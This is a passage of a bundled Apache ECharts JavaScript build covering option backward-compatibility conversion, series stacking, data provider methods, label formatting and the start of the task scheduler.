i++) {\n        var styleName = POSSIBLE_STYLES[i];\n        var normalItemStyleOpt = itemStyleOpt.normal;\n        var emphasisItemStyleOpt = itemStyleOpt.emphasis;\n        if (normalItemStyleOpt && normalItemStyleOpt[styleName]) {\n            opt[styleName] = opt[styleName] || {};\n            if (!opt[styleName].normal) {\n                opt[styleName].normal = normalItemStyleOpt[styleName];\n            }\n            else {\n                merge(opt[styleName].normal, normalItemStyleOpt[styleName]);\n            }\n            normalItemStyleOpt[styleName] = null;\n        }\n        if (emphasisItemStyleOpt && emphasisItemStyleOpt[styleName]) {\n            opt[styleName] = opt[styleName] || {};\n            if (!opt[styleName].emphasis) {\n                opt[styleName].emphasis = emphasisItemStyleOpt[styleName];\n            }\n            else {\n                merge(opt[styleName].emphasis, emphasisItemStyleOpt[styleName]);\n            }\n            emphasisItemStyleOpt[styleName] = null;\n        }\n    }\n}\n\nfunction convertNormalEmphasis(opt, optType, useExtend) {\n    if (opt && opt[optType] && (opt[optType].normal || opt[optType].emphasis)) {\n        var normalOpt = opt[optType].normal;\n        var emphasisOpt = opt[optType].emphasis;\n\n        if (normalOpt) {\n            // Timeline controlStyle has other properties besides normal and emphasis\n            if (useExtend) {\n                opt[optType].normal = opt[optType].emphasis = null;\n                defaults(opt[optType], normalOpt);\n            }\n            else {\n                opt[optType] = normalOpt;\n            }\n        }\n        if (emphasisOpt) {\n            opt.emphasis = opt.emphasis || {};\n            opt.emphasis[optType] = emphasisOpt;\n        }\n    }\n}\n\nfunction removeEC3NormalStatus(opt) {\n    convertNormalEmphasis(opt, 'itemStyle');\n    convertNormalEmphasis(opt, 'lineStyle');\n    convertNormalEmphasis(opt, 'areaStyle');\n    convertNormalEmphasis(opt, 'label');\n    convertNormalEmphasis(opt, 'labelLine');\n    // treemap\n    convertNormalEmphasis(opt, 'upperLabel');\n    // graph\n    convertNormalEmphasis(opt, 'edgeLabel');\n}\n\nfunction compatTextStyle(opt, propName) {\n    // Check whether is not object (string\\null\\undefined ...)\n    var labelOptSingle = isObject$3(opt) && opt[propName];\n    var textStyle = isObject$3(labelOptSingle) && labelOptSingle.textStyle;\n    if (textStyle) {\n        for (var i = 0, len = TEXT_STYLE_OPTIONS.length; i < len; i++) {\n            var propName = TEXT_STYLE_OPTIONS[i];\n            if (textStyle.hasOwnProperty(propName)) {\n                labelOptSingle[propName] = textStyle[propName];\n            }\n        }\n    }\n}\n\nfunction compatEC3CommonStyles(opt) {\n    if (opt) {\n        removeEC3NormalStatus(opt);\n        compatTextStyle(opt, 'label');\n        opt.emphasis && compatTextStyle(opt.emphasis, 'label');\n    }\n}\n\nfunction processSeries(seriesOpt) {\n    if (!isObject$3(seriesOpt)) {\n        return;\n    }\n\n    compatEC2ItemStyle(seriesOpt);\n    removeEC3NormalStatus(seriesOpt);\n\n    compatTextStyle(seriesOpt, 'label');\n    // treemap\n    compatTextStyle(seriesOpt, 'upperLabel');\n    // graph\n    compatTextStyle(seriesOpt, 'edgeLabel');\n    if (seriesOpt.emphasis) {\n        compatTextStyle(seriesOpt.emphasis, 'label');\n        // treemap\n        compatTextStyle(seriesOpt.emphasis, 'upperLabel');\n        // graph\n        compatTextStyle(seriesOpt.emphasis, 'edgeLabel');\n    }\n\n    var markPoint = seriesOpt.markPoint;\n    if (markPoint) {\n        compatEC2ItemStyle(markPoint);\n        compatEC3CommonStyles(markPoint);\n    }\n\n    var markLine = seriesOpt.markLine;\n    if (markLine) {\n        compatEC2ItemStyle(markLine);\n        compatEC3CommonStyles(markLine);\n    }\n\n    var markArea = seriesOpt.markArea;\n    if (markArea) {\n        compatEC3CommonStyles(markArea);\n    }\n\n    var data = seriesOpt.data;\n\n    // Break with ec3: if `setOption` again, there may be no `type` in option,\n    // then the backward compat based on option type will not be performed.\n\n    if (seriesOpt.type === 'graph') {\n        data = data || seriesOpt.nodes;\n        var edgeData = seriesOpt.links || seriesOpt.edges;\n        if (edgeData && !isTypedArray(edgeData)) {\n            for (var i = 0; i < edgeData.length; i++) {\n                compatEC3CommonStyles(edgeData[i]);\n            }\n        }\n        each$1(seriesOpt.categories, function (opt) {\n            removeEC3NormalStatus(opt);\n        });\n    }\n\n    if (data && !isTypedArray(data)) {\n        for (var i = 0; i < data.length; i++) {\n            compatEC3CommonStyles(data[i]);\n        }\n    }\n\n    // mark point data\n    var markPoint = seriesOpt.markPoint;\n    if (markPoint && markPoint.data) {\n        var mpData = markPoint.data;\n        for (var i = 0; i < mpData.length; i++) {\n            compatEC3CommonStyles(mpData[i]);\n        }\n    }\n    // mark line data\n    var markLine = seriesOpt.markLine;\n    if (markLine && markLine.data) {\n        var mlData = markLine.data;\n        for (var i = 0; i < mlData.length; i++) {\n            if (isArray(mlData[i])) {\n                compatEC3CommonStyles(mlData[i][0]);\n                compatEC3CommonStyles(mlData[i][1]);\n            }\n            else {\n                compatEC3CommonStyles(mlData[i]);\n            }\n        }\n    }\n\n    // Series\n    if (seriesOpt.type === 'gauge') {\n        compatTextStyle(seriesOpt, 'axisLabel');\n        compatTextStyle(seriesOpt, 'title');\n        compatTextStyle(seriesOpt, 'detail');\n    }\n    else if (seriesOpt.type === 'treemap') {\n        convertNormalEmphasis(seriesOpt.breadcrumb, 'itemStyle');\n        each$1(seriesOpt.levels, function (opt) {\n            removeEC3NormalStatus(opt);\n        });\n    }\n    else if (seriesOpt.type === 'tree') {\n        removeEC3NormalStatus(seriesOpt.leaves);\n    }\n    // sunburst starts from ec4, so it does not need to compat levels.\n}\n\nfunction toArr(o) {\n    return isArray(o) ? o : o ? [o] : [];\n}\n\nfunction toObj(o) {\n    return (isArray(o) ? o[0] : o) || {};\n}\n\nvar compatStyle = function (option, isTheme) {\n    each$5(toArr(option.series), function (seriesOpt) {\n        isObject$3(seriesOpt) && processSeries(seriesOpt);\n    });\n\n    var axes = ['xAxis', 'yAxis', 'radiusAxis', 'angleAxis', 'singleAxis', 'parallelAxis', 'radar'];\n    isTheme && axes.push('valueAxis', 'categoryAxis', 'logAxis', 'timeAxis');\n\n    each$5(\n        axes,\n        function (axisName) {\n            each$5(toArr(option[axisName]), function (axisOpt) {\n                if (axisOpt) {\n                    compatTextStyle(axisOpt, 'axisLabel');\n                    compatTextStyle(axisOpt.axisPointer, 'label');\n                }\n            });\n        }\n    );\n\n    each$5(toArr(option.parallel), function (parallelOpt) {\n        var parallelAxisDefault = parallelOpt && parallelOpt.parallelAxisDefault;\n        compatTextStyle(parallelAxisDefault, 'axisLabel');\n        compatTextStyle(parallelAxisDefault && parallelAxisDefault.axisPointer, 'label');\n    });\n\n    each$5(toArr(option.calendar), function (calendarOpt) {\n        convertNormalEmphasis(calendarOpt, 'itemStyle');\n        compatTextStyle(calendarOpt, 'dayLabel');\n        compatTextStyle(calendarOpt, 'monthLabel');\n        compatTextStyle(calendarOpt, 'yearLabel');\n    });\n\n    // radar.name.textStyle\n    each$5(toArr(option.radar), function (radarOpt) {\n        compatTextStyle(radarOpt, 'name');\n    });\n\n    each$5(toArr(option.geo), function (geoOpt) {\n        if (isObject$3(geoOpt)) {\n            compatEC3CommonStyles(geoOpt);\n            each$5(toArr(geoOpt.regions), function (regionObj) {\n                compatEC3CommonStyles(regionObj);\n            });\n        }\n    });\n\n    each$5(toArr(option.timeline), function (timelineOpt) {\n        compatEC3CommonStyles(timelineOpt);\n        convertNormalEmphasis(timelineOpt, 'label');\n        convertNormalEmphasis(timelineOpt, 'itemStyle');\n        convertNormalEmphasis(timelineOpt, 'controlStyle', true);\n\n        var data = timelineOpt.data;\n        isArray(data) && each$1(data, function (item) {\n            if (isObject$1(item)) {\n                convertNormalEmphasis(item, 'label');\n                convertNormalEmphasis(item, 'itemStyle');\n            }\n        });\n    });\n\n    each$5(toArr(option.toolbox), function (toolboxOpt) {\n        convertNormalEmphasis(toolboxOpt, 'iconStyle');\n        each$5(toolboxOpt.feature, function (featureOpt) {\n            convertNormalEmphasis(featureOpt, 'iconStyle');\n        });\n    });\n\n    compatTextStyle(toObj(option.axisPointer), 'label');\n    compatTextStyle(toObj(option.tooltip).axisPointer, 'label');\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Compatitable with 2.0\n\nfunction get(opt, path) {\n    path = path.split(',');\n    var obj = opt;\n    for (var i = 0; i < path.length; i++) {\n        obj = obj && obj[path[i]];\n        if (obj == null) {\n            break;\n        }\n    }\n    return obj;\n}\n\nfunction set$1(opt, path, val, overwrite) {\n    path = path.split(',');\n    var obj = opt;\n    var key;\n    for (var i = 0; i < path.length - 1; i++) {\n        key = path[i];\n        if (obj[key] == null) {\n            obj[key] = {};\n        }\n        obj = obj[key];\n    }\n    if (overwrite || obj[path[i]] == null) {\n        obj[path[i]] = val;\n    }\n}\n\nfunction compatLayoutProperties(option) {\n    each$1(LAYOUT_PROPERTIES, function (prop) {\n        if (prop[0] in option && !(prop[1] in option)) {\n            option[prop[1]] = option[prop[0]];\n        }\n    });\n}\n\nvar LAYOUT_PROPERTIES = [\n    ['x', 'left'], ['y', 'top'], ['x2', 'right'], ['y2', 'bottom']\n];\n\nvar COMPATITABLE_COMPONENTS = [\n    'grid', 'geo', 'parallel', 'legend', 'toolbox', 'title', 'visualMap', 'dataZoom', 'timeline'\n];\n\nvar backwardCompat = function (option, isTheme) {\n    compatStyle(option, isTheme);\n\n    // Make sure series array for model initialization.\n    option.series = normalizeToArray(option.series);\n\n    each$1(option.series, function (seriesOpt) {\n        if (!isObject$1(seriesOpt)) {\n            return;\n        }\n\n        var seriesType = seriesOpt.type;\n\n        if (seriesType === 'line') {\n            if (seriesOpt.clipOverflow != null) {\n                seriesOpt.clip = seriesOpt.clipOverflow;\n            }\n        }\n        else if (seriesType === 'pie' || seriesType === 'gauge') {\n            if (seriesOpt.clockWise != null) {\n                seriesOpt.clockwise = seriesOpt.clockWise;\n            }\n        }\n        else if (seriesType === 'gauge') {\n            var pointerColor = get(seriesOpt, 'pointer.color');\n            pointerColor != null\n                && set$1(seriesOpt, 'itemStyle.color', pointerColor);\n        }\n\n        compatLayoutProperties(seriesOpt);\n    });\n\n    // dataRange has changed to visualMap\n    if (option.dataRange) {\n        option.visualMap = option.dataRange;\n    }\n\n    each$1(COMPATITABLE_COMPONENTS, function (componentName) {\n        var options = option[componentName];\n        if (options) {\n            if (!isArray(options)) {\n                options = [options];\n            }\n            each$1(options, function (option) {\n                compatLayoutProperties(option);\n            });\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// (1) [Caution]: the logic is correct based on the premises:\n//     data processing stage is blocked in stream.\n//     See <module:echarts/stream/Scheduler#performDataProcessorTasks>\n// (2) Only register once when import repeatly.\n//     Should be executed after series filtered and before stack calculation.\nvar dataStack = function (ecModel) {\n    var stackInfoMap = createHashMap();\n    ecModel.eachSeries(function (seriesModel) {\n        var stack = seriesModel.get('stack');\n        // Compatibal: when `stack` is set as '', do not stack.\n        if (stack) {\n            var stackInfoList = stackInfoMap.get(stack) || stackInfoMap.set(stack, []);\n            var data = seriesModel.getData();\n\n            var stackInfo = {\n                // Used for calculate axis extent automatically.\n                stackResultDimension: data.getCalculationInfo('stackResultDimension'),\n                stackedOverDimension: data.getCalculationInfo('stackedOverDimension'),\n                stackedDimension: data.getCalculationInfo('stackedDimension'),\n                stackedByDimension: data.getCalculationInfo('stackedByDimension'),\n                isStackedByIndex: data.getCalculationInfo('isStackedByIndex'),\n                data: data,\n                seriesModel: seriesModel\n            };\n\n            // If stacked on axis that do not support data stack.\n            if (!stackInfo.stackedDimension\n                || !(stackInfo.isStackedByIndex || stackInfo.stackedByDimension)\n            ) {\n                return;\n            }\n\n            stackInfoList.length && data.setCalculationInfo(\n                'stackedOnSeries', stackInfoList[stackInfoList.length - 1].seriesModel\n            );\n\n            stackInfoList.push(stackInfo);\n        }\n    });\n\n    stackInfoMap.each(calculateStack);\n};\n\nfunction calculateStack(stackInfoList) {\n    each$1(stackInfoList, function (targetStackInfo, idxInStack) {\n        var resultVal = [];\n        var resultNaN = [NaN, NaN];\n        var dims = [targetStackInfo.stackResultDimension, targetStackInfo.stackedOverDimension];\n        var targetData = targetStackInfo.data;\n        var isStackedByIndex = targetStackInfo.isStackedByIndex;\n\n        // Should not write on raw data, because stack series model list changes\n        // depending on legend selection.\n        var newData = targetData.map(dims, function (v0, v1, dataIndex) {\n            var sum = targetData.get(targetStackInfo.stackedDimension, dataIndex);\n\n            // Consider `connectNulls` of line area, if value is NaN, stackedOver\n            // should also be NaN, to draw a appropriate belt area.\n            if (isNaN(sum)) {\n                return resultNaN;\n            }\n\n            var byValue;\n            var stackedDataRawIndex;\n\n            if (isStackedByIndex) {\n                stackedDataRawIndex = targetData.getRawIndex(dataIndex);\n            }\n            else {\n                byValue = targetData.get(targetStackInfo.stackedByDimension, dataIndex);\n            }\n\n            // If stackOver is NaN, chart view will render point on value start.\n            var stackedOver = NaN;\n\n            for (var j = idxInStack - 1; j >= 0; j--) {\n                var stackInfo = stackInfoList[j];\n\n                // Has been optimized by inverted indices on `stackedByDimension`.\n                if (!isStackedByIndex) {\n                    stackedDataRawIndex = stackInfo.data.rawIndexOf(stackInfo.stackedByDimension, byValue);\n                }\n\n                if (stackedDataRawIndex >= 0) {\n                    var val = stackInfo.data.getByRawIndex(stackInfo.stackResultDimension, stackedDataRawIndex);\n\n                    // Considering positive stack, negative stack and empty data\n                    if ((sum >= 0 && val > 0) // Positive stack\n                        || (sum <= 0 && val < 0) // Negative stack\n                    ) {\n                        sum += val;\n                        stackedOver = val;\n                        break;\n                    }\n                }\n            }\n\n            resultVal[0] = sum;\n            resultVal[1] = stackedOver;\n\n            return resultVal;\n        });\n\n        targetData.hostModel.setData(newData);\n        // Update for consequent calculation\n        targetStackInfo.data = newData;\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// TODO\n// ??? refactor? check the outer usage of data provider.\n// merge with defaultDimValueGetter?\n\n/**\n * If normal array used, mutable chunk size is supported.\n * If typed array used, chunk size must be fixed.\n */\nfunction DefaultDataProvider(source, dimSize) {\n    if (!Source.isInstance(source)) {\n        source = Source.seriesDataToSource(source);\n    }\n    this._source = source;\n\n    var data = this._data = source.data;\n    var sourceFormat = source.sourceFormat;\n\n    // Typed array. TODO IE10+?\n    if (sourceFormat === SOURCE_FORMAT_TYPED_ARRAY) {\n        if (__DEV__) {\n            if (dimSize == null) {\n                throw new Error('Typed array data must specify dimension size');\n            }\n        }\n        this._offset = 0;\n        this._dimSize = dimSize;\n        this._data = data;\n    }\n\n    var methods = providerMethods[\n        sourceFormat === SOURCE_FORMAT_ARRAY_ROWS\n        ? sourceFormat + '_' + source.seriesLayoutBy\n        : sourceFormat\n    ];\n\n    if (__DEV__) {\n        assert$1(methods, 'Invalide sourceFormat: ' + sourceFormat);\n    }\n\n    extend(this, methods);\n}\n\nvar providerProto = DefaultDataProvider.prototype;\n// If data is pure without style configuration\nproviderProto.pure = false;\n// If data is persistent and will not be released after use.\nproviderProto.persistent = true;\n\n// ???! FIXME legacy data provider do not has method getSource\nproviderProto.getSource = function () {\n    return this._source;\n};\n\nvar providerMethods = {\n\n    'arrayRows_column': {\n        pure: true,\n        count: function () {\n            return Math.max(0, this._data.length - this._source.startIndex);\n        },\n        getItem: function (idx) {\n            return this._data[idx + this._source.startIndex];\n        },\n        appendData: appendDataSimply\n    },\n\n    'arrayRows_row': {\n        pure: true,\n        count: function () {\n            var row = this._data[0];\n            return row ? Math.max(0, row.length - this._source.startIndex) : 0;\n        },\n        getItem: function (idx) {\n            idx += this._source.startIndex;\n            var item = [];\n            var data = this._data;\n            for (var i = 0; i < data.length; i++) {\n                var row = data[i];\n                item.push(row ? row[idx] : null);\n            }\n            return item;\n        },\n        appendData: function () {\n            throw new Error('Do not support appendData when set seriesLayoutBy: \"row\".');\n        }\n    },\n\n    'objectRows': {\n        pure: true,\n        count: countSimply,\n        getItem: getItemSimply,\n        appendData: appendDataSimply\n    },\n\n    'keyedColumns': {\n        pure: true,\n        count: function () {\n            var dimName = this._source.dimensionsDefine[0].name;\n            var col = this._data[dimName];\n            return col ? col.length : 0;\n        },\n        getItem: function (idx) {\n            var item = [];\n            var dims = this._source.dimensionsDefine;\n            for (var i = 0; i < dims.length; i++) {\n                var col = this._data[dims[i].name];\n                item.push(col ? col[idx] : null);\n            }\n            return item;\n        },\n        appendData: function (newData) {\n            var data = this._data;\n            each$1(newData, function (newCol, key) {\n                var oldCol = data[key] || (data[key] = []);\n                for (var i = 0; i < (newCol || []).length; i++) {\n                    oldCol.push(newCol[i]);\n                }\n            });\n        }\n    },\n\n    'original': {\n        count: countSimply,\n        getItem: getItemSimply,\n        appendData: appendDataSimply\n    },\n\n    'typedArray': {\n        persistent: false,\n        pure: true,\n        count: function () {\n            return this._data ? (this._data.length / this._dimSize) : 0;\n        },\n        getItem: function (idx, out) {\n            idx = idx - this._offset;\n            out = out || [];\n            var offset = this._dimSize * idx;\n            for (var i = 0; i < this._dimSize; i++) {\n                out[i] = this._data[offset + i];\n            }\n            return out;\n        },\n        appendData: function (newData) {\n            if (__DEV__) {\n                assert$1(\n                    isTypedArray(newData),\n                    'Added data must be TypedArray if data in initialization is TypedArray'\n                );\n            }\n\n            this._data = newData;\n        },\n\n        // Clean self if data is already used.\n        clean: function () {\n            // PENDING\n            this._offset += this.count();\n            this._data = null;\n        }\n    }\n};\n\nfunction countSimply() {\n    return this._data.length;\n}\nfunction getItemSimply(idx) {\n    return this._data[idx];\n}\nfunction appendDataSimply(newData) {\n    for (var i = 0; i < newData.length; i++) {\n        this._data.push(newData[i]);\n    }\n}\n\n\n\nvar rawValueGetters = {\n\n    arrayRows: getRawValueSimply,\n\n    objectRows: function (dataItem, dataIndex, dimIndex, dimName) {\n        return dimIndex != null ? dataItem[dimName] : dataItem;\n    },\n\n    keyedColumns: getRawValueSimply,\n\n    original: function (dataItem, dataIndex, dimIndex, dimName) {\n        // FIXME\n        // In some case (markpoint in geo (geo-map.html)), dataItem\n        // is {coord: [...]}\n        var value = getDataItemValue(dataItem);\n        return (dimIndex == null || !(value instanceof Array))\n            ? value\n            : value[dimIndex];\n    },\n\n    typedArray: getRawValueSimply\n};\n\nfunction getRawValueSimply(dataItem, dataIndex, dimIndex, dimName) {\n    return dimIndex != null ? dataItem[dimIndex] : dataItem;\n}\n\n\nvar defaultDimValueGetters = {\n\n    arrayRows: getDimValueSimply,\n\n    objectRows: function (dataItem, dimName, dataIndex, dimIndex) {\n        return converDataValue(dataItem[dimName], this._dimensionInfos[dimName]);\n    },\n\n    keyedColumns: getDimValueSimply,\n\n    original: function (dataItem, dimName, dataIndex, dimIndex) {\n        // Performance sensitive, do not use modelUtil.getDataItemValue.\n        // If dataItem is an plain object with no value field, the var `value`\n        // will be assigned with the object, but it will be tread correctly\n        // in the `convertDataValue`.\n        var value = dataItem && (dataItem.value == null ? dataItem : dataItem.value);\n\n        // If any dataItem is like { value: 10 }\n        if (!this._rawData.pure && isDataItemOption(dataItem)) {\n            this.hasItemOption = true;\n        }\n        return converDataValue(\n            (value instanceof Array)\n                ? value[dimIndex]\n                // If value is a single number or something else not array.\n                : value,\n            this._dimensionInfos[dimName]\n        );\n    },\n\n    typedArray: function (dataItem, dimName, dataIndex, dimIndex) {\n        return dataItem[dimIndex];\n    }\n\n};\n\nfunction getDimValueSimply(dataItem, dimName, dataIndex, dimIndex) {\n    return converDataValue(dataItem[dimIndex], this._dimensionInfos[dimName]);\n}\n\n/**\n * This helper method convert value in data.\n * @param {string|number|Date} value\n * @param {Object|string} [dimInfo] If string (like 'x'), dimType defaults 'number'.\n *        If \"dimInfo.ordinalParseAndSave\", ordinal value can be parsed.\n */\nfunction converDataValue(value, dimInfo) {\n    // Performance sensitive.\n    var dimType = dimInfo && dimInfo.type;\n    if (dimType === 'ordinal') {\n        // If given value is a category string\n        var ordinalMeta = dimInfo && dimInfo.ordinalMeta;\n        return ordinalMeta\n            ? ordinalMeta.parseAndCollect(value)\n            : value;\n    }\n\n    if (dimType === 'time'\n        // spead up when using timestamp\n        && typeof value !== 'number'\n        && value != null\n        && value !== '-'\n    ) {\n        value = +parseDate(value);\n    }\n\n    // dimType defaults 'number'.\n    // If dimType is not ordinal and value is null or undefined or NaN or '-',\n    // parse to NaN.\n    return (value == null || value === '')\n        ? NaN\n        // If string (like '-'), using '+' parse to NaN\n        // If object, also parse to NaN\n        : +value;\n}\n\n// ??? FIXME can these logic be more neat: getRawValue, getRawDataItem,\n// Consider persistent.\n// Caution: why use raw value to display on label or tooltip?\n// A reason is to avoid format. For example time value we do not know\n// how to format is expected. More over, if stack is used, calculated\n// value may be 0.91000000001, which have brings trouble to display.\n// TODO: consider how to treat null/undefined/NaN when display?\n/**\n * @param {module:echarts/data/List} data\n * @param {number} dataIndex\n * @param {string|number} [dim] dimName or dimIndex\n * @return {Array.<number>|string|number} can be null/undefined.\n */\nfunction retrieveRawValue(data, dataIndex, dim) {\n    if (!data) {\n        return;\n    }\n\n    // Consider data may be not persistent.\n    var dataItem = data.getRawDataItem(dataIndex);\n\n    if (dataItem == null) {\n        return;\n    }\n\n    var sourceFormat = data.getProvider().getSource().sourceFormat;\n    var dimName;\n    var dimIndex;\n\n    var dimInfo = data.getDimensionInfo(dim);\n    if (dimInfo) {\n        dimName = dimInfo.name;\n        dimIndex = dimInfo.index;\n    }\n\n    return rawValueGetters[sourceFormat](dataItem, dataIndex, dimIndex, dimName);\n}\n\n/**\n * Compatible with some cases (in pie, map) like:\n * data: [{name: 'xx', value: 5, selected: true}, ...]\n * where only sourceFormat is 'original' and 'objectRows' supported.\n *\n * ??? TODO\n * Supported detail options in data item when using 'arrayRows'.\n *\n * @param {module:echarts/data/List} data\n * @param {number} dataIndex\n * @param {string} attr like 'selected'\n */\nfunction retrieveRawAttr(data, dataIndex, attr) {\n    if (!data) {\n        return;\n    }\n\n    var sourceFormat = data.getProvider().getSource().sourceFormat;\n\n    if (sourceFormat !== SOURCE_FORMAT_ORIGINAL\n        && sourceFormat !== SOURCE_FORMAT_OBJECT_ROWS\n    ) {\n        return;\n    }\n\n    var dataItem = data.getRawDataItem(dataIndex);\n    if (sourceFormat === SOURCE_FORMAT_ORIGINAL && !isObject$1(dataItem)) {\n        dataItem = null;\n    }\n    if (dataItem) {\n        return dataItem[attr];\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar DIMENSION_LABEL_REG = /\\{@(.+?)\\}/g;\n\n// PENDING A little ugly\nvar dataFormatMixin = {\n    /**\n     * Get params for formatter\n     * @param {number} dataIndex\n     * @param {string} [dataType]\n     * @return {Object}\n     */\n    getDataParams: function (dataIndex, dataType) {\n        var data = this.getData(dataType);\n        var rawValue = this.getRawValue(dataIndex, dataType);\n        var rawDataIndex = data.getRawIndex(dataIndex);\n        var name = data.getName(dataIndex);\n        var itemOpt = data.getRawDataItem(dataIndex);\n        var color = data.getItemVisual(dataIndex, 'color');\n        var borderColor = data.getItemVisual(dataIndex, 'borderColor');\n        var tooltipModel = this.ecModel.getComponent('tooltip');\n        var renderModeOption = tooltipModel && tooltipModel.get('renderMode');\n        var renderMode = getTooltipRenderMode(renderModeOption);\n        var mainType = this.mainType;\n        var isSeries = mainType === 'series';\n        var userOutput = data.userOutput;\n\n        return {\n            componentType: mainType,\n            componentSubType: this.subType,\n            componentIndex: this.componentIndex,\n            seriesType: isSeries ? this.subType : null,\n            seriesIndex: this.seriesIndex,\n            seriesId: isSeries ? this.id : null,\n            seriesName: isSeries ? this.name : null,\n            name: name,\n            dataIndex: rawDataIndex,\n            data: itemOpt,\n            dataType: dataType,\n            value: rawValue,\n            color: color,\n            borderColor: borderColor,\n            dimensionNames: userOutput ? userOutput.dimensionNames : null,\n            encode: userOutput ? userOutput.encode : null,\n            marker: getTooltipMarker({\n                color: color,\n                renderMode: renderMode\n            }),\n\n            // Param name list for mapping `a`, `b`, `c`, `d`, `e`\n            $vars: ['seriesName', 'name', 'value']\n        };\n    },\n\n    /**\n     * Format label\n     * @param {number} dataIndex\n     * @param {string} [status='normal'] 'normal' or 'emphasis'\n     * @param {string} [dataType]\n     * @param {number} [dimIndex] Only used in some chart that\n     *        use formatter in different dimensions, like radar.\n     * @param {string} [labelProp='label']\n     * @return {string} If not formatter, return null/undefined\n     */\n    getFormattedLabel: function (dataIndex, status, dataType, dimIndex, labelProp) {\n        status = status || 'normal';\n        var data = this.getData(dataType);\n        var itemModel = data.getItemModel(dataIndex);\n\n        var params = this.getDataParams(dataIndex, dataType);\n        if (dimIndex != null && (params.value instanceof Array)) {\n            params.value = params.value[dimIndex];\n        }\n\n        var formatter = itemModel.get(\n            status === 'normal'\n            ? [labelProp || 'label', 'formatter']\n            : [status, labelProp || 'label', 'formatter']\n        );\n\n        if (typeof formatter === 'function') {\n            params.status = status;\n            params.dimensionIndex = dimIndex;\n            return formatter(params);\n        }\n        else if (typeof formatter === 'string') {\n            var str = formatTpl(formatter, params);\n\n            // Support 'aaa{@[3]}bbb{@product}ccc'.\n            // Do not support '}' in dim name util have to.\n            return str.replace(DIMENSION_LABEL_REG, function (origin, dim) {\n                var len = dim.length;\n                if (dim.charAt(0) === '[' && dim.charAt(len - 1) === ']') {\n                    dim = +dim.slice(1, len - 1); // Also: '[]' => 0\n                }\n                return retrieveRawValue(data, dataIndex, dim);\n            });\n        }\n    },\n\n    /**\n     * Get raw value in option\n     * @param {number} idx\n     * @param {string} [dataType]\n     * @return {Array|number|string}\n     */\n    getRawValue: function (idx, dataType) {\n        return retrieveRawValue(this.getData(dataType), idx);\n    },\n\n    /**\n     * Should be implemented.\n     * @param {number} dataIndex\n     * @param {boolean} [multipleSeries=false]\n     * @param {number} [dataType]\n     * @return {string} tooltip string\n     */\n    formatTooltip: function () {\n        // Empty function\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {Object} define\n * @return See the return of `createTask`.\n */\nfunction createTask(define) {\n    return new Task(define);\n}\n\n/**\n * @constructor\n * @param {Object} define\n * @param {Function} define.reset Custom reset\n * @param {Function} [define.plan] Returns 'reset' indicate reset immediately.\n * @param {Function} [define.count] count is used to determin data task.\n * @param {Function} [define.onDirty] count is used to determin data task.\n */\nfunction Task(define) {\n    define = define || {};\n\n    this._reset = define.reset;\n    this._plan = define.plan;\n    this._count = define.count;\n    this._onDirty = define.onDirty;\n\n    this._dirty = true;\n\n    // Context must be specified implicitly, to\n    // avoid miss update context when model changed.\n    this.context;\n}\n\nvar taskProto = Task.prototype;\n\n/**\n * @param {Object} performArgs\n * @param {number} [performArgs.step] Specified step.\n * @param {number} [performArgs.skip] Skip customer perform call.\n * @param {number} [performArgs.modBy] Sampling window size.\n * @param {number} [performArgs.modDataCount] Sampling count.\n */\ntaskProto.perform = function (performArgs) {\n    var upTask = this._upstream;\n    var skip = performArgs && performArgs.skip;\n\n    // TODO some refactor.\n    // Pull data. Must pull data each time, because context.data\n    // may be updated by Series.setData.\n    if (this._dirty && upTask) {\n        var context = this.context;\n        